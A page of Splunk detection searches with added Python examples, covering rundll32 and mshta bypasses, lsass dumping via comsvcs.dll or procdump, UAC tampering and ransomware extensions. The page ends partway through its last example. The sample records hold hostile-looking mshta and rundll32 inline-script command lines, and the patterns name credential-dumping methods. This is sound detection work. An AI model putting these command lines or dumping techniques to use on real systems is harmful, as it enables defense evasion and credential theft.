  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Endpoint
  • ATT&CK: T1218.011
  • Last Updated: 2021-02-04

Search

| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name=rundll32.exe Processes.process=*syssetup* by Processes.user Processes.process_name Processes.process Processes.dest | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_rundll32_application_control_bypass___syssetup_filter`

Associated Analytic Story


How To Implement

To successfully implement this search, you need to be ingesting process execution data, including process names and command lines, from your endpoints into the `Endpoint` data model in the `Processes` node.

Required field

ATT&CK

ID Technique Tactic
T1218.011 Rundll32 Defense Evasion


Kill Chain Phase

  • Actions on Objectives


Known False Positives

Although unlikely, some legitimate applications may use syssetup.dll, triggering a false positive.

Reference


Test Dataset


version: 1


Detect rundll32 inline hta execution

The following analytic identifies "rundll32.exe" execution with inline protocol handlers. "JavaScript", "VBScript", and "About" are the only supported options when invoking HTA content directly on the command-line. This type of behavior is commonly observed with fileless malware or application whitelisting bypass techniques. The search will return the first time and last time these command-line arguments were used for these executions, as well as the target system, the user, process "rundll32.exe" and its parent process.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Endpoint
  • ATT&CK: T1218.005
  • Last Updated: 2021-01-20

Search

| tstats `security_content_summariesonly` count values(Processes.process) as process values(Processes.parent_process) as parent_process min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name=rundll32.exe (Processes.process=*vbscript* OR Processes.process=*javascript* OR Processes.process=*about*) by Processes.user Processes.process_name Processes.parent_process_name Processes.dest | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_rundll32_inline_hta_execution_filter`

Associated Analytic Story


How To Implement

To successfully implement this search, you need to be ingesting process execution data, including parent and child process names and command lines, from your endpoints into the `Endpoint` data model in the `Processes` node.

Required field

ATT&CK

ID Technique Tactic
T1218.005 Mshta Defense Evasion


Kill Chain Phase

  • Exploitation


Known False Positives

Although unlikely, some legitimate applications may exhibit this behavior, triggering a false positive.

Reference


Test Dataset


version: 1


Detect use of cmd exe to launch script interpreters

This search looks for executions of cscript.exe or wscript.exe with a parent process of cmd.exe. The search returns the count, the first and last time this execution was seen, the user, and the host (destination) on which it ran.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Endpoint
  • ATT&CK: T1059.003
  • Last Updated: 2020-07-21

Search

| tstats `security_content_summariesonly` count values(Processes.process) as process min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.parent_process_name="cmd.exe" (Processes.process_name=cscript.exe OR Processes.process_name=wscript.exe) by Processes.parent_process Processes.process_name Processes.user Processes.dest | `drop_dm_object_name("Processes")` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_use_of_cmd_exe_to_launch_script_interpreters_filter`

Associated Analytic Story


How To Implement

To successfully implement this search, you must be ingesting data that records process activity from your hosts to populate the endpoint data model in the processes node. If you are using Sysmon, you must have at least version 6.0.4 of the Sysmon TA.

Required field

ATT&CK

ID Technique Tactic
T1059.003 Windows Command Shell Execution


Kill Chain Phase

  • Exploitation


Known False Positives

Some legitimate applications may exhibit this behavior.

Reference

Test Dataset


version: 4


Detect mshta inline hta execution

The following analytic identifies "mshta.exe" execution with inline protocol handlers. "JavaScript", "VBScript", and "About" are the only supported options when invoking HTA content directly on the command-line. The search will return the first time and last time these command-line arguments were used for these executions, as well as the target system, the user, process "mshta.exe" and its parent process.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Endpoint
  • ATT&CK: T1218.005
  • Last Updated: 2021-01-20

Search

| tstats `security_content_summariesonly` count values(Processes.process) as process values(Processes.parent_process) as parent_process min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name=mshta.exe (Processes.process=*vbscript* OR Processes.process=*javascript* OR Processes.process=*about*) by Processes.user Processes.process_name Processes.parent_process_name Processes.dest | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_mshta_inline_hta_execution_filter`
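The rundll32.exe and mshta.exe inline-HTA searches match the wildcard strings `*vbscript*`, `*javascript*` and `*about*` anywhere in the command line. The Python below is an added example, not Splunk's code, that anchors on the protocol handler name followed by its colon instead, run over constructed Sysmon EventID 1 records (the fields, paths, host and user names are assumptions). It also shows the kind of command line the bare substring match flags but the anchored match does not, which is where most of the tuning effort for these two searches goes.

```python
import re

# Protocol handlers that mshta.exe accepts inline on its command line and that
# rundll32.exe can be pointed at. Anchoring on the handler name followed by a
# colon avoids hits on unrelated text that merely contains the word (a file
# called about_us.hta, a path under \vbscript\ ...).
HANDLER = re.compile(r"\b(javascript|vbscript|about):", re.IGNORECASE)
KEYWORDS = ("javascript", "vbscript", "about")   # the searches' *vbscript* style wildcards
WATCHED = {"mshta.exe", "rundll32.exe"}


def substring_match(command_line):
    """What the wildcard searches do: any of the words anywhere."""
    lowered = command_line.lower()
    return any(k in lowered for k in KEYWORDS)


def handler_match(command_line):
    """Tighter check: returns the handler name, or None."""
    m = HANDLER.search(command_line)
    return m.group(1).lower() if m else None


def inline_handler_launches(events):
    """Apply the anchored check to Sysmon EventID 1 records and return
    (dest, User, process_name, ParentImage, handler) per hit."""
    hits = []
    for ev in events:
        name = ev.get("process_name", "").lower()
        if name not in WATCHED:
            continue
        handler = handler_match(ev.get("CommandLine", ""))
        if handler:
            hits.append((ev["Computer"], ev["User"], name, ev["ParentImage"], handler))
    return hits


# Constructed sample records (not real telemetry).
SAMPLE_EVENTS = [
    {"Computer": "ws01", "User": "CORP\\alice", "process_name": "mshta.exe",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "CommandLine": 'mshta.exe vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""cmd /c whoami"",0:close")'},
    {"Computer": "ws02", "User": "CORP\\bob", "process_name": "rundll32.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write()'},
    # an HTA whose file name happens to contain "about": substring hit, handler miss
    {"Computer": "ws03", "User": "CORP\\carol", "process_name": "mshta.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"mshta.exe C:\Users\carol\Downloads\about_us.hta"},
    # ordinary rundll32 use
    {"Computer": "ws04", "User": "CORP\\dan", "process_name": "rundll32.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"rundll32.exe shell32.dll,Control_RunDLL"},
    # a browser is outside the two searches' scope
    {"Computer": "ws05", "User": "CORP\\erin", "process_name": "chrome.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'chrome.exe "javascript:void(0)"'},
]

if __name__ == "__main__":
    for hit in inline_handler_launches(SAMPLE_EVENTS):
        print("inline handler:", hit)
    for ev in SAMPLE_EVENTS:
        if substring_match(ev["CommandLine"]) and not handler_match(ev["CommandLine"]):
            print("wildcard-only hit (likely noise):", ev["CommandLine"])
```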

Associated Analytic Story


How To Implement

To successfully implement this search, you need to be ingesting process execution data, including parent and child process names and command lines, from your endpoints into the `Endpoint` data model in the `Processes` node.

Required field

ATT&CK

ID Technique Tactic
T1218.005 Mshta Defense Evasion


Kill Chain Phase

  • Exploitation


Known False Positives

Although unlikely, some legitimate applications may exhibit this behavior, triggering a false positive.

Reference


Test Dataset


version: 5


Detect mshta renamed

The following analytic identifies renamed instances of mshta.exe executing. Mshta.exe is natively found in C:\Windows\system32 and C:\Windows\syswow64. This analytic uses the internal name of the PE (OriginalFileName) to recognize the legitimate mshta binary even when the file on disk has been renamed. Further analysis should be performed to review the executed content and validate that it is the real mshta.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK: T1218.005
  • Last Updated: 2021-01-20

Search

`sysmon` EventID=1 (OriginalFileName=mshta.exe AND process_name!=mshta.exe) | stats count min(_time) as firstTime max(_time) as lastTime by Computer, User, parent_process_name, process_name, OriginalFileName, process_path, CommandLine | rename Computer as dest | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `detect_mshta_renamed_filter`

Associated Analytic Story


How To Implement

To successfully implement this search, you need to be ingesting Sysmon process creation events (EventID 1) with the process name, parent process, command line and the PE OriginalFileName from your endpoints; the search relies on the `sysmon` macro and on Sysmon field names. You must have at least version 6.0.4 of the Sysmon TA.

Required field

ATT&CK

ID Technique Tactic
T1218.005 Mshta Defense Evasion


Kill Chain Phase

  • Exploitation


Known False Positives

Although unlikely, some legitimate applications may execute a copy of mshta.exe from a non-standard location. A copy that keeps the name mshta.exe will not trigger this search; a renamed copy will, which could cause a false positive.

Reference


Test Dataset


version: 1


Detect processes used for system network configuration discovery

This search looks for fast execution of processes used for system network configuration discovery on the endpoint.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Endpoint
  • ATT&CK: T1016
  • Last Updated: 2020-11-10

Search

| tstats `security_content_summariesonly` count values(Processes.process) as process values(Processes.parent_process) as parent_process min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes by Processes.dest Processes.process_name Processes.user _time | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `drop_dm_object_name(Processes)` | search `system_network_configuration_discovery_tools` | transaction dest connected=false maxpause=5m |where eventcount>=5 | table firstTime lastTime dest user process_name process parent_process eventcount | `detect_processes_used_for_system_network_configuration_discovery_filter`
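The search above chains executions of network-configuration tools per host with `transaction dest maxpause=5m` and keeps only chains of five or more events. The Python below is an added example, not Splunk's code, of that windowing applied to constructed process records. The contents of the `system_network_configuration_discovery_tools` macro are not shown on this page, so the tool list, event fields, host and user names are assumptions; the host running an inventory script illustrates the administrator false positive the page warns about.

```python
from collections import defaultdict

MAXPAUSE = 5 * 60   # seconds; `transaction dest ... maxpause=5m`
MIN_EVENTS = 5      # `where eventcount>=5`

# Illustrative contents of the `system_network_configuration_discovery_tools`
# macro, which the page does not reproduce (assumption).
DISCOVERY_TOOLS = {
    "ipconfig.exe", "netsh.exe", "arp.exe", "route.exe", "nbtstat.exe",
    "net.exe", "net1.exe", "systeminfo.exe", "hostname.exe", "whoami.exe",
}


def _chain_summary(dest, chain):
    return (dest, chain[0]["_time"], chain[-1]["_time"], len(chain),
            sorted({e["user"] for e in chain}),
            sorted({e["process_name"].lower() for e in chain}))


def discovery_bursts(events, maxpause=MAXPAUSE, min_events=MIN_EVENTS):
    """Chain discovery-tool executions per host: an event joins the current
    chain when it follows the previous event by at most `maxpause` seconds,
    otherwise a new chain starts. Chains with at least `min_events` events
    are returned as (dest, firstTime, lastTime, eventcount, users, tools)."""
    per_host = defaultdict(list)
    for ev in events:
        if ev["process_name"].lower() in DISCOVERY_TOOLS:
            per_host[ev["dest"]].append(ev)

    bursts = []
    for dest, evs in per_host.items():
        evs.sort(key=lambda e: e["_time"])
        chain = [evs[0]]
        for ev in evs[1:]:
            if ev["_time"] - chain[-1]["_time"] <= maxpause:
                chain.append(ev)
                continue
            if len(chain) >= min_events:
                bursts.append(_chain_summary(dest, chain))
            chain = [ev]
        if len(chain) >= min_events:
            bursts.append(_chain_summary(dest, chain))
    return bursts


# Constructed sample records (not real telemetry). Times are offsets in
# seconds from T0.
T0 = 1605000000


def _ev(t, dest, user, name, cmd):
    return {"_time": T0 + t, "dest": dest, "user": user, "process_name": name, "process": cmd}


SAMPLE_EVENTS = [
    # ws01: six discovery commands inside three minutes, hands-on-keyboard style
    _ev(0,   "ws01", "CORP\\alice", "ipconfig.exe", "ipconfig /all"),
    _ev(20,  "ws01", "CORP\\alice", "arp.exe", "arp -a"),
    _ev(45,  "ws01", "CORP\\alice", "route.exe", "route print"),
    _ev(70,  "ws01", "CORP\\alice", "netsh.exe", "netsh advfirewall show allprofiles"),
    _ev(100, "ws01", "CORP\\alice", "nbtstat.exe", "nbtstat -n"),
    _ev(130, "ws01", "CORP\\alice", "whoami.exe", "whoami /all"),
    # ws02: two ipconfig runs an hour apart plus unrelated noise
    _ev(0,    "ws02", "CORP\\bob", "ipconfig.exe", "ipconfig"),
    _ev(3600, "ws02", "CORP\\bob", "ipconfig.exe", "ipconfig /release"),
    _ev(3610, "ws02", "CORP\\bob", "notepad.exe", "notepad.exe"),
    # srv01: an inventory script, four commands, a long gap, then two more
    _ev(0,   "srv01", "CORP\\svc_inv", "systeminfo.exe", "systeminfo"),
    _ev(60,  "srv01", "CORP\\svc_inv", "hostname.exe", "hostname"),
    _ev(120, "srv01", "CORP\\svc_inv", "ipconfig.exe", "ipconfig /all"),
    _ev(180, "srv01", "CORP\\svc_inv", "net.exe", "net config workstation"),
    _ev(900, "srv01", "CORP\\svc_inv", "arp.exe", "arp -a"),
    _ev(960, "srv01", "CORP\\svc_inv", "route.exe", "route print"),
]

if __name__ == "__main__":
    for burst in discovery_bursts(SAMPLE_EVENTS):
        print("discovery burst:", burst)
```

Lowering `min_events` to 4 also surfaces the srv01 inventory run, which is the trade-off the false-positive note describes: a tighter threshold catches shorter manual reconnaissance at the cost of more administrator scripts.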

Associated Analytic Story


How To Implement

You must be ingesting data that records process activity from your hosts to populate the Endpoint data model in the Processes node. This is typically populated via an endpoint detection-and-response product, such as Carbon Black, or endpoint data sources, such as Sysmon. The data used for this search is usually generated by logs that report process creation, or by Windows event logs after enabling process tracking (with command-line auditing) in your Windows audit settings. The set of discovery tools is defined by the `system_network_configuration_discovery_tools` macro.

Required field

ATT&CK

ID Technique Tactic
T1016 System Network Configuration Discovery Discovery


Kill Chain Phase

  • Installation
  • Command and Control
  • Actions on Objectives


Known False Positives

It is uncommon for normal users to execute a series of commands used for network discovery. System administrators often use scripts to execute these commands. These can generate false positives.

Reference

Test Dataset


version: 2


Detection of tools built by nirsoft

This search looks for specific command-line arguments that may indicate the execution of tools made by Nirsoft, which are legitimate, but may be abused by attackers.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Endpoint
  • ATT&CK: T1072
  • Last Updated: 2020-07-21

Search

| tstats `security_content_summariesonly` count min(_time) as firstTime values(Processes.process) as process max(_time) as lastTime from datamodel=Endpoint.Processes where (Processes.process="* /stext *" OR Processes.process="* /scomma *" ) by Processes.parent_process Processes.process_name Processes.user | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` |`security_content_ctime(lastTime)` | `detection_of_tools_built_by_nirsoft_filter`

Associated Analytic Story


How To Implement

You must be ingesting endpoint data that tracks process activity, including parent-child relationships from your endpoints to populate the Endpoint data model in the Processes node. The command-line arguments are mapped to the "process" field in the Endpoint data model.

Required field

ATT&CK

ID Technique Tactic
T1072 Software Deployment Tools Execution, Lateral Movement


Kill Chain Phase

  • Installation
  • Actions on Objectives


Known False Positives

While legitimate, these NirSoft tools are prone to abuse. You should verify that the tool was used for a legitimate purpose.

Reference

Test Dataset

version: 3


Disabling remote user account control

The search looks for modifications to registry keys that control the enforcement of Windows User Account Control (UAC).

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK: T1548.002
  • Last Updated: 2020-11-18

Search

| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Registry where Registry.registry_path=*HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\EnableLUA* Registry.registry_value_name="DWORD (0x00000000)" by Registry.dest, Registry.registry_key_name Registry.user Registry.registry_path Registry.registry_value_name Registry.action | `drop_dm_object_name(Registry)` | `disabling_remote_user_account_control_filter`

Associated Analytic Story


How To Implement

To successfully implement this search, you must be ingesting data that records registry activity from your hosts to populate the Endpoint data model in the Registry node. This is typically populated via an endpoint detection-and-response product, such as Carbon Black, or via other endpoint data sources, such as Sysmon. The data used for this search is typically generated via logs that report registry modifications.

Required field

ATT&CK

ID Technique Tactic
T1548.002 Bypass User Account Control Defense Evasion, Privilege Escalation


Kill Chain Phase

  • Actions on Objectives


Known False Positives

This registry key may be modified by administrators to implement a change in system policy. This type of change should be a very rare occurrence.

Reference

Test Dataset


version: 4


Dump lsass via comsvcs dll

Detect the usage of comsvcs.dll for dumping the lsass process.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Endpoint
  • ATT&CK: T1003.001
  • Last Updated: 2020-02-21

Search

| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name=rundll32.exe Processes.process=*comsvcs.dll* Processes.process=*MiniDump* by Processes.user Processes.process_name Processes.process Processes.dest | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `dump_lsass_via_comsvcs_dll_filter`

Associated Analytic Story


How To Implement

You must be ingesting endpoint data that tracks process activity, including parent-child relationships from your endpoints, to populate the Endpoint data model in the Processes node. The command-line arguments are mapped to the "process" field in the Endpoint data model.

Required field

ATT&CK

ID Technique Tactic
T1003.001 LSASS Memory Credential Access


Kill Chain Phase

  • Actions on Objectives


Known False Positives

None identified.

Reference


Test Dataset


version: 1


Dump lsass via procdump

Detect procdump.exe dumping the lsass process. This query looks for both -mm and -ma usage: -mm produces a mini dump file and -ma writes a dump file with all process memory. Both are highly suspect and should be reviewed. This query does not monitor for the internal name (OriginalFileName=procdump) of the PE or look for procdump64.exe; modify the query as needed. During triage, confirm this is procdump.exe executing. If it is the first time a Sysinternals utility has been run, it is possible there will be a -accepteula on the command line. Review other endpoint data sources for cross-process activity (injection) into lsass.exe.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Endpoint
  • ATT&CK: T1003.001
  • Last Updated: 2021-02-01

Search

| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name=procdump.exe (Processes.process=*-ma* OR Processes.process=*-mm*) Processes.process=*lsass* by Processes.user Processes.process_name Processes.process Processes.dest | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `dump_lsass_via_procdump_filter`

Associated Analytic Story


How To Implement

To successfully implement this search you need to be ingesting process information, including the name of the process responsible for the changes, from your endpoints into the `Endpoint` data model in the `Processes` node.

Required field

ATT&CK

ID Technique Tactic
T1003.001 LSASS Memory Credential Access


Kill Chain Phase

  • Actions on Objectives


Known False Positives

None identified.

Reference


Test Dataset


version: 1


Dump lsass via procdump rename

Detect a renamed instance of procdump.exe dumping the lsass process. This query looks for both -mm and -ma usage: -mm produces a mini dump file and -ma writes a dump file with all process memory. Both are highly suspect and should be reviewed. Modify the query as needed. During triage, confirm this is procdump.exe executing. If it is the first time a Sysinternals utility has been run, it is possible there will be a -accepteula on the command line. Review other endpoint data sources for cross-process activity (injection) into lsass.exe.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK: T1003.001
  • Last Updated: 2021-02-01

Search

`sysmon` OriginalFileName=procdump process_name!=procdump*.exe EventID=1 (CommandLine=*-ma* OR CommandLine=*-mm*) CommandLine=*lsass* | rename Computer as dest | stats count min(_time) as firstTime max(_time) as lastTime by dest, parent_process_name, process_name, OriginalFileName, CommandLine | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `dump_lsass_via_procdump_rename_filter`

Associated Analytic Story


How To Implement

To successfully implement this search you need to be ingesting process information, including the name of the process responsible for the changes, from your endpoints into the `Endpoint` data model in the `Processes` node.

Required field

ATT&CK

ID Technique Tactic
T1003.001 LSASS Memory Credential Access


Kill Chain Phase

  • Actions on Objectives


Known False Positives

None identified.

Reference


Test Dataset


version: 1


Execution of file with multiple extensions

This search looks for processes launched from files that have double extensions in the file name. This is typically done to obscure the "real" file extension and make it appear as though the file being accessed is a data file, as opposed to executable content.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Endpoint
  • ATT&CK: T1036.003
  • Last Updated: 2020-11-18

Search

| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process = *.doc.exe OR Processes.process = *.htm.exe OR Processes.process = *.html.exe OR Processes.process = *.txt.exe OR Processes.process = *.pdf.exe by Processes.dest Processes.user Processes.process Processes.parent_process | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `drop_dm_object_name(Processes)` | `execution_of_file_with_multiple_extensions_filter`

Associated Analytic Story


How To Implement

To successfully implement this search, you must be ingesting data that records process activity from your hosts to populate the endpoint data model in the processes node.

Required field

ATT&CK

ID Technique Tactic
T1036.003 Rename System Utilities Defense Evasion


Kill Chain Phase

  • Actions on Objectives


Known False Positives

None identified.

Reference

Test Dataset


version: 3


File with samsam extension

The search looks for file writes with extensions consistent with a SamSam ransomware attack.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Endpoint
  • ATT&CK:
  • Last Updated: 2018-12-14

Search

| tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime values(Filesystem.user) as user values(Filesystem.dest) as dest values(Filesystem.file_path) as file_path from datamodel=Endpoint.Filesystem by Filesystem.file_name | `drop_dm_object_name(Filesystem)` | `security_content_ctime(lastTime)` | `security_content_ctime(firstTime)` | rex field=file_name "(?<file_extension>\.[^\.]+)$" | search file_extension=.stubbin OR file_extension=.berkshire OR file_extension=.satoshi OR file_extension=.sophos OR file_extension=.keyxml | `file_with_samsam_extension_filter`

Associated Analytic Story


How To Implement

You must be ingesting data that records file-system activity from your hosts to populate the Endpoint file-system data-model node. If you are using Sysmon, you will need a Splunk Universal Forwarder on each endpoint from which you want to collect data.
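Both this detection and "Execution of file with multiple extensions" above reduce to a check on the tail of a file name: the `rex` here pulls the final extension and compares it with a fixed list, while the double-extension search matches a data-file extension immediately followed by `.exe`. The Python below is an added example, not Splunk's code; it applies the same two checks to constructed file-write and process events so the matching (including case handling, which SPL wildcard and `search` comparisons treat case-insensitively) can be verified offline. File names, paths, hosts and users are constructed.

```python
"""Extension checks behind the two file-name detections (added example)."""
import re

# Same regex as the SamSam search's rex: the last ".something" at the end
EXT_RE = re.compile(r"(?P<file_extension>\.[^.]+)$")

# Extensions listed in the "File with samsam extension" search
SAMSAM_EXTENSIONS = {".stubbin", ".berkshire", ".satoshi", ".sophos", ".keyxml"}

# Patterns from the "Execution of file with multiple extensions" search
# (*.doc.exe, *.htm.exe, *.html.exe, *.txt.exe, *.pdf.exe); the trailing
# wildcard-less pattern anchors at the end of the process field, as here.
DOUBLE_EXT_RE = re.compile(r"\.(doc|htm|html|txt|pdf)\.exe$", re.IGNORECASE)

# Constructed file-write events: (dest, user, file_path, file_name)
FILE_WRITES = [
    ("fs-01", "alice", r"C:\Users\alice\Documents", "budget.xlsx"),
    ("fs-01", "alice", r"C:\Users\alice\Documents", "budget.xlsx.stubbin"),
    ("fs-01", "alice", r"C:\Users\alice\Documents", "notes.TXT.BERKSHIRE"),
    ("fs-02", "bob",   r"C:\Temp",                  "README"),
]

# Constructed process events: (dest, user, process)
PROCESS_LAUNCHES = [
    ("wks-07", "carol", r"C:\Users\carol\Downloads\invoice.pdf.exe"),
    ("wks-07", "carol", r"C:\Program Files\Editor\editor.exe"),
    ("wks-09", "dave",  r"C:\Users\dave\Desktop\Report.DOC.EXE"),
    ("wks-09", "dave",  r"C:\Windows\System32\notepad.exe report.doc"),
]


def file_extension(file_name):
    """Return the lower-cased final extension, or None when there is none."""
    match = EXT_RE.search(file_name)
    return match.group("file_extension").lower() if match else None


def samsam_extension_hits(file_writes, extensions=SAMSAM_EXTENSIONS):
    """File writes whose final extension is on the SamSam list."""
    return [
        {"dest": dest, "user": user, "file_path": path, "file_name": name,
         "file_extension": file_extension(name)}
        for dest, user, path, name in file_writes
        if file_extension(name) in extensions
    ]


def double_extension_hits(process_launches, pattern=DOUBLE_EXT_RE):
    """Process launches whose process field ends in a data extension + .exe."""
    return [
        {"dest": dest, "user": user, "process": process}
        for dest, user, process in process_launches
        if pattern.search(process)
    ]


if __name__ == "__main__":
    for hit in samsam_extension_hits(FILE_WRITES):
        print("samsam extension:", hit)
    for hit in double_extension_hits(PROCESS_LAUNCHES):
        print("double extension:", hit)
```

Note that the double-extension check only fires when the process field ends with the pattern; a launch whose command line carries arguments after the executable name (the last sample event) is not matched, which is the same limitation the search has.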

Required field

Kill Chain Phase

  • Installation


Known False Positives

Because these extensions are not typically used in normal operations, you should investigate all results.

Reference

Test Dataset


version: 1


First time seen child process of zoom

This search looks for child processes spawned by zoom.exe or zoom.us that have not previously been seen.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel: Endpoint
  • ATT&CK: T1068
  • Last Updated: 2020-05-20

Search

| tstats `security_content_summariesonly` min(_time) as firstTime values(Processes.parent_process_name) as parent_process_name values(Processes.parent_process_id) as parent_process_id values(Processes.process_name) as process_name values(Processes.process) as process from datamodel=Endpoint.Processes where (Processes.parent_process_name=zoom.exe OR Processes.parent_process_name=zoom.us) by Processes.process_id Processes.dest | `drop_dm_object_name(Processes)` | lookup zoom_first_time_child_process dest as dest process_name as process_name OUTPUT firstTimeSeen | where isnull(firstTimeSeen) OR firstTimeSeen > relative_time(now(), "`previously_seen_zoom_child_processes_window`") | `security_content_ctime(firstTime)` | table firstTime dest, process_id, process_name, parent_process_id, parent_process_name |`first_time_seen_child_process_of_zoom_filter`

Associated Analytic Story


How To Implement

You must be ingesting data that records process activity from your hosts to populate the Endpoint data model in the Processes node. You should run the baseline search `Previously Seen Zoom Child Processes - Initial` to build the initial table of child processes and hostnames for this search to work. You should also schedule at the same interval as this search the second baseline search `Previously Seen Zoom Child Processes - Update` to keep this table up to date and to age out old child processes. Please update the `previously_seen_zoom_child_processes_window` macro to adjust the time window.

Required field

ATT&CK

ID Technique Tactic
T1068 Exploitation for Privilege Escalation Privilege Escalation


Kill Chain Phase

  • Actions on Objectives


Known False Positives

A new child process of zoom isn't malicious by that fact alone. Further investigation of the actions of the child process is needed to verify any malicious behavior is taken.

Reference

Test Dataset


version: 1


First time seen running windows service

This search looks for the first and last time a Windows service is seen running in your environment. This table is then cached.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • ATT&CK: T1569.002
  • Last Updated: 2020-07-21

Search

`wineventlog_system` EventCode=7036 | rex field=Message "The (?<service>[-\(\)\s\w]+) service entered the (?<state>\w+) state" | where state="running" | lookup previously_seen_running_windows_services service as service OUTPUT firstTimeSeen | where isnull(firstTimeSeen) OR firstTimeSeen > relative_time(now(), `previously_seen_windows_services_window`) | table _time dest service | `first_time_seen_running_windows_service_filter`

Associated Analytic Story


How To Implement

While this search does not require you to adhere to Splunk CIM, you must be ingesting your Windows system event logs in order for this search to execute successfully. You should run the baseline search `Previously Seen Running Windows Services - Initial` to build the initial table of child processes and hostnames for this search to work. You should also schedule at the same interval as this search the second baseline search `Previously Seen Running Windows Services - Update` to keep this table up to date and to age out old Windows Services. Please update the `previously_seen_windows_services_window` macro to adjust the time window. Please ensure that the Splunk Add-on for Microsoft Windows is version 8.0.0 or above.
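The search parses the free-text 7036 message with a regex, keeps only services entering the running state, and alerts when the service is absent from the baseline lookup or was first seen inside the configured window. The Python below is an added example, not Splunk's code: the regex is the one from the search, while the in-memory baseline, the 30-day window and the age-out rule stand in for the `previously_seen_running_windows_services` lookup, the `previously_seen_windows_services_window` macro and the "Update" baseline search, whose exact behaviour is not on this page (assumptions). Event messages, hosts and service names are constructed.

```python
"""First-time-seen Windows services from EventCode 7036 (added example)."""
import re
from datetime import datetime, timedelta

# Regex from the search's rex stage
SERVICE_RE = re.compile(
    r"The (?P<service>[-\(\)\s\w]+) service entered the (?P<state>\w+) state")

NOW = datetime(2020, 7, 21, 12, 0, 0)   # constructed "now" for the example


def parse_7036(message):
    """Return (service, state) from a 7036 message, or None if it does not match."""
    m = SERVICE_RE.search(message)
    return (m.group("service"), m.group("state")) if m else None


class ServiceBaseline:
    """Stand-in for the lookup: service -> (firstTimeSeen, lastTimeSeen)."""

    def __init__(self, window=timedelta(days=30)):
        self.window = window      # assumed value of the window macro
        self.table = {}

    def observe(self, service, seen_at):
        """What the 'Update' baseline search does: record first/last sightings."""
        first, _ = self.table.get(service, (seen_at, seen_at))
        self.table[service] = (min(first, seen_at), max(seen_at, seen_at))

    def age_out(self, now):
        """Drop services not seen inside the window (assumed 'Update' behaviour)."""
        cutoff = now - self.window
        self.table = {s: v for s, v in self.table.items() if v[1] >= cutoff}

    def is_first_time(self, service, now):
        """Same condition as the search: isnull(firstTimeSeen) OR
        firstTimeSeen > relative_time(now(), window)."""
        entry = self.table.get(service)
        return entry is None or entry[0] > now - self.window


def detect_new_running_services(events, baseline, now):
    """events: (time, dest, message). Returns rows like the search's table."""
    hits = []
    for ts, dest, message in events:
        parsed = parse_7036(message)
        if parsed is None:
            continue
        service, state = parsed
        if state != "running":
            continue
        if baseline.is_first_time(service, now):
            hits.append({"_time": ts, "dest": dest, "service": service})
    return hits


def build_sample_baseline():
    """Constructed baseline: two long-known services, one first seen five days
    ago, and one stale agent last seen in January."""
    b = ServiceBaseline()
    b.observe("Windows Update", datetime(2019, 1, 15))
    b.observe("Windows Update", datetime(2020, 7, 20))
    b.observe("Print Spooler", datetime(2019, 1, 15))
    b.observe("Print Spooler", datetime(2020, 7, 20))
    b.observe("Background Intelligent Transfer Service (BITS)", datetime(2020, 7, 16))
    b.observe("OldAgent", datetime(2020, 1, 1))
    return b


# Constructed 7036 events: (time, dest, message)
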